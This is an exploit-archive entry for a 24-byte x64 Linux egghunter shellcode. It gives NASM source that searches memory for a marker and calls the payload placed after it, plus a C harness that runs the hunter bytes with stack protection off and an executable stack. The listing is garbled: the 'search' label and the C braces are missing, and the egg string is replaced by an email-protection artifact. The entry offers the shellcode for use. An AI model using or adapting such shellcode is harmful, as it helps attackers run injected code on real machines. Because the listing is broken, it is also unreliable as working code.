linux/x64 gghunter - 24 bytes

ID 1337DAY-ID-24574
Type zdt
Reporter David Velázquez
Modified 2015-11-18T00:00:00


Exploit for linux/x86-64 platform in category shellcode

;Title:            x64 Linux egghunter in 24 bytes 
;Author:           David Velázquez a.k.a d4sh&r
;Description:      x64 Linux egghunter that looks for the string "[email protected]@ck"
;                  and then execute the shellcode
;Tested On:        Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux 
;Compile & Run:    nasm -f elf64 -o egghunter.o egghunter.nasm
;                  ld -o egghunter egghunter.o
global _start
    pop rax  ; some address in the stack 
        inc rax       
        cmp [rax - 4] , dword 0x6b634068 ; "[email protected]"  
jnz search   
        cmp [rax - 8] , dword 0x6b634068 ; "[email protected]"  
jnz search
        call  rax   ; execute shellcode 
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
unsigned char hunter[] = "\x58\x48\xff\xc0\x81\x78\xfc\x68\x40\x63\x6b\x75\xf4\x81\x78\xf8\x68\x40\x63\x6b\x75\xeb\xff\xd0";
unsigned char egg[] = \
"\x68\x40\x63\x6b"  //egg
"\x68\x40\x63\x6b"  //egg
int main()
        printf("Hunter Length:  %d\n", (int)strlen(hunter));
        (*(void  (*)()) hunter)();

# [2018-01-01]  #